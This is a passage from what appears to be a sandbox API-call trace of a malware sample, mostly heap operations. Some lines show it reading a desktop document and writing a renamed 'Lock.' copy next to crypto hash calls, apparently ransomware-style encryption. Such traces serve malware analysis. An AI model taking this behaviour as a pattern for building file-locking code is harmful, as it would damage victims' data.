cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0105.963] CryptDestroyHash (hHash=0x9a3b80) returned 1 [0105.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0105.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0105.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0105.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0105.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0105.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0105.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0105.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0105.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0105.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0105.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0105.963] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0105.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0105.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0105.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0105.964] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0105.964] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.964] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.964] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0105.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0105.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0105.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0105.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0105.964] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/vY9PyxRY3.odp" (normalized: "c:\\users\\fd1hvy\\desktop\\vy9pyxry3.odp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x44c [0105.964] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.964] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0105.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f60 [0105.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0105.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0105.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0105.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0105.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0105.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0105.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0105.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0105.965] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0105.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0105.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0105.965] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0105.965] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0105.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0105.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0105.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0105.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0105.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0105.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0105.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0105.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0105.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0105.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0105.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0105.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0105.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0105.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0105.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0105.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0105.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0105.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0105.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75678 [0105.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0105.966] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0105.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75678 | out: hHeap=0x2af0000) returned 1 [0105.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0105.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0105.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2abe880 [0105.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0105.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0105.966] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.vY9PyxRY3.odp" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.vy9pyxry3.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0105.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f40 [0105.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0105.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0105.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0105.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0105.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0105.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0105.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0105.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0105.967] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0105.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0105.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0105.967] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0105.967] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0105.967] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0105.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0105.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0105.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0105.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0105.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0105.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0105.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0105.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0105.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0105.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0105.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0105.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0105.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0105.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0105.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0105.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0105.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0105.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0105.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0105.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0105.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0105.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0105.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0105.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0105.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0105.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0105.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0105.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0105.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0105.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0105.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x4caf020 [0105.971] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0105.971] ReadFile (in: hFile=0x44c, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x6236, lpOverlapped=0x0) returned 1 [0105.972] ReadFile (in: hFile=0x44c, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0105.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0105.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0105.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0105.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0105.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x6236) returned 0x2a7a130 [0105.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4caf020 | out: hHeap=0x2af0000) returned 1 [0105.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0105.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0105.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0105.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0105.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0105.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0105.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0105.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0105.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x6236) returned 0x2a80370 [0105.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0105.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0105.977] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0105.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0105.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0105.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0105.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0105.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x6236) returned 0x2a7a130 [0105.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0105.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0105.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0105.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0105.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0105.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0105.977] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0105.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0105.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0105.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0105.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0105.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0105.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0105.977] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0105.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0105.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0105.977] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0105.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0105.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0105.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0105.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72778 [0105.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0105.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0105.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0105.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0105.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x6236) returned 0x2a7a130 [0105.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0105.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72aa8 [0105.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0105.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0105.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0105.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a08 [0105.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0105.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0105.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0105.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b08 [0105.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0105.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0105.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0105.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa97c0 [0105.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0105.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0105.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0105.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0105.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0105.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0105.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0105.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x6236) returned 0x2a865b0 [0105.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0105.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0105.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0105.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0105.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0105.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0105.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0105.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0105.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0105.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0105.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0105.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0105.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0105.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0105.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0105.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0105.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0105.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0105.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0105.979] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0105.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0105.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 